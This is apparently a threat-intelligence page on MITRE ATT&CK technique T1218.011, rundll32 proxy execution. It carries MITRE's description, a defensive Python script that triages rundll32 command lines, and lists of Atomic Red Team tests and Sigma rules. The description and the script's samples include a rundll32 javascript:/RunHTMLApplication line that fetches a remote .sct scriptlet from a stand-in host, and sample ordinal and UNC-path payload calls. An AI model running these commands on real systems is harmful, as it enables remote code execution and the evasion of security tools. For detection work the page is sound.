T1218.011: Rundll32
| View on MITRE ATT&CK | T1218.011 |
|---|---|
| Tactic(s) | Defense Evasion |
Data from MITRE ATT&CK®:
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).
Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"
This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. (Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).
Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
© 2024 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
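The description above gives three things a detection engineer has to reason about when a rundll32.exe process-creation event (Sysmon EID 1, Windows EID 4688) lands in the queue: how the command line splits into DLL, entry point and arguments; which export names rundll32 will actually probe (EntryW, then EntryA, then Entry, or a bare ordinal); and which indicators on this page (ordinal calls, non-.dll extensions, UNC paths, the javascript:/RunHTMLApplication trick, Control_RunDLL, url.dll FileProtocolHandler) are present. The following is an added example written for this page, not code from MITRE, Sigma or Atomic Red Team. The sample command lines, IP address and paths are constructed, the parser is a simplified model of rundll32's own command-line handling, and the "trusted directory" list is an assumption to tune per environment.

```python
"""Triage rundll32 command lines from process-creation events (added example)."""
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample CommandLine values as they would appear in Sysmon EID 1 or
# Windows EID 4688; not real telemetry.
SAMPLE_EVENTS = [
    r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\shell32.dll",Control_RunDLL desk.cpl',
    r'rundll32.exe C:\Users\Public\update.dat,#1',
    r'rundll32.exe \\10.0.0.5\share\payload.dll,DllRegisterServer',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://www.example.com/malicious.sct")',
    r'rundll32.exe url.dll,FileProtocolHandler calc.exe',
    r'rundll32.exe user32.dll,LockWorkStation',   # benign baseline
    r'C:\Windows\System32\cmd.exe /c whoami',      # not rundll32; skipped
]

# Order in which rundll32 resolves a named export: Unicode, ANSI, then bare.
EXPORT_SUFFIX_ORDER = ("W", "A", "")
# Assumption: DLLs under these roots count as expected locations.
TRUSTED_DIR_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

RUNDLL32_IMAGE = re.compile(r'^\s*"?(?:[^"\s]*[\\/])?rundll32(?:\.exe)?"?\s*', re.IGNORECASE)


@dataclass
class Rundll32Call:
    cmdline: str
    dll: str
    entry: str                  # export name, "#N" ordinal, or "" if absent
    args: str
    candidates: List[str] = field(default_factory=list)  # exports in lookup order
    findings: List[str] = field(default_factory=list)


def export_candidates(entry: str) -> List[str]:
    """Names rundll32 tries for an entry point; an ordinal is not suffixed."""
    if not entry:
        return []
    if entry.startswith("#"):
        return [entry]
    return [entry + suffix for suffix in EXPORT_SUFFIX_ORDER]


def parse_rundll32(cmdline: str) -> Optional[Rundll32Call]:
    """Split "rundll32.exe <dll>,<entry> <args>" into its parts.

    Simplified model of rundll32's parser: the DLL is a quoted token or runs
    to the first comma or whitespace; the entry point follows an optional
    comma and runs to the next whitespace. Returns None for other images.
    """
    m = RUNDLL32_IMAGE.match(cmdline)
    if not m:
        return None
    rest = cmdline[m.end():]
    if rest.startswith('"'):
        close = rest.find('"', 1)
        close = len(rest) if close < 0 else close
        dll, rest = rest[1:close], rest[close + 1:]
    else:
        tok = re.match(r"[^,\s]*", rest)
        dll, rest = tok.group(0), rest[tok.end():]
    rest = re.sub(r"^\s*,?\s*", "", rest, count=1)
    tok = re.match(r"\S*", rest)
    entry, args = tok.group(0), rest[tok.end():].strip()
    return Rundll32Call(cmdline, dll, entry, args, export_candidates(entry))


def assess(call: Rundll32Call) -> Rundll32Call:
    """Attach the indicators named on this page to a parsed call."""
    dll, entry = call.dll.lower(), call.entry.lower()
    ext = ntpath.splitext(ntpath.basename(dll))[1]
    f = call.findings
    if dll.startswith("javascript:") or entry == "runhtmlapplication":
        f.append("script execution via javascript: protocol / mshtml RunHTMLApplication")
    if dll.startswith("\\\\"):
        f.append("DLL loaded from UNC path")
    elif re.match(r"[a-z]:\\", dll) and not dll.startswith(TRUSTED_DIR_PREFIXES):
        f.append("DLL outside Windows/Program Files directories")
    if ext != ".dll":
        f.append(f"DLL without .dll extension ({ext or 'none'})")
    if entry.startswith("#"):
        f.append(f"export called by ordinal {call.entry}")
    elif not entry:
        f.append("no entry point given")
    if entry in ("control_rundll", "control_rundllasuser"):
        f.append("Control Panel item execution (inspect the .cpl argument)")
    if dll.endswith("url.dll") and entry == "fileprotocolhandler":
        f.append("url.dll FileProtocolHandler used to open a target")
    return call


def triage_events(cmdlines: List[str]) -> List[Rundll32Call]:
    """Parse and assess every rundll32 command line; other images are skipped."""
    return [assess(c) for c in map(parse_rundll32, cmdlines) if c is not None]


if __name__ == "__main__":
    for call in triage_events(SAMPLE_EVENTS):
        print(f"{call.dll},{call.entry or '<none>'} -> tries {call.candidates}")
        for finding in call.findings:
            print(f"    [!] {finding}")
```

The candidate list is what to check against the DLL's export table when a call looks benign by name: a DLL that exports both Harmless and HarmlessW is executing HarmlessW, exactly the trick the description covers. Everything in findings is an indicator, not a verdict; Control_RunDLL with desk.cpl is normal desktop activity, so the parent process, user and DLL signature (the Module Load and File Metadata sources below) decide the escalation.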
Reporting on this Technique
REDCURL - The pentest you didn't know about
This report by researchers at Group-IB outlines activity by a group they call RedCurl. The report identifies victimology and motivation (corporate ...
KAPEKA A novel backdoor spotted in Eastern Europe
This report from researchers at WithSecure unveils a novel backdoor: 'Kapeka'. Kapeka has been used against victims in Eastern Europe ...
Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation
This blog post by threat researchers at Mandiant outlines intrusions activity by the UNC3886 intrusion set which involved the deployment of ...
From OneNote to RansomNote: An Ice Cold Intrusion
This case report from The DFIR Report describes an intrusion which started with a malicious OneNote attachment. Opening the OneNote file led to ...
Mitigations for this technique
MITRE ATT&CK Mitigations
How to detect this technique
MITRE ATT&CK Data Components
File Metadata (File)
Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.
Module Load (Module)
Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)
Command Execution (Command)
The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc.)
Process Creation (Process)
The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)
Control Validation Tests for this Technique
Use Atomic Red Team tests to test your defenses against this technique.
Rundll32 with Control_RunDLL
Rundll32 setupapi.dll Execution
Rundll32 with desk.cpl
Rundll32 execute VBscript command using Ordinal number
Rundll32 ieadvpack.dll Execution
Execution of HTA and VBS Files using Rundll32 and URL.dll
Rundll32 advpack.dll Execution
Rundll32 execute VBscript command
Launches an executable using Rundll32 and pcwutl.dll
Rundll32 syssetup.dll Execution
Execution of non-dll using rundll32.exe
Running DLL with .init extension and function
Rundll32 execute command via FileProtocolHandler
Rundll32 execute JavaScript Remote Payload With GetObject
Rundll32 with Ordinal Value
Sigma Detections for this Technique
Code Execution via Pcwutl.dll
Rundll32 InstallScreenSaver Execution
Rundll32 Internet Connection
Rundll32 Execution With Uncommon DLL Extension
Process Access via TrolleyExpress Exclusion
Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Unsigned DLL Loaded by Windows Utility
Outbound Network Connection To Public IP Via Winlogon
Remote Thread Creation Via PowerShell In Uncommon Target
HackTool - F-Secure C3 Load by Rundll32
RunDLL32 Spawning Explorer
Rundll32 UNC Path Execution
Suspicious Rundll32 Activity Invoking Sys File
ScreenSaver Registry Key Set
Suspicious Rundll32 Setupapi.dll Activity
Suspicious Call by Ordinal
Potential PowerShell Execution Via DLL
HackTool - RedMimicry Winnti Playbook Execution
Potentially Suspicious Rundll32 Activity
Suspicious HH.EXE Execution
Suspicious Rundll32 Execution With Image Extension
Shell32 DLL Execution in Suspicious Directory
HTML Help HH.EXE Suspicious Child Process
SCR File Write Event
Suspicious Control Panel DLL Load
CobaltStrike Load by Rundll32
SP800-53 Controls
See which controls can help protect against this MITRE ATT&CK technique. This is based on mappings to associated SP800-53 controls produced by the MITRE Engenuity Center for Threat-Informed Defense.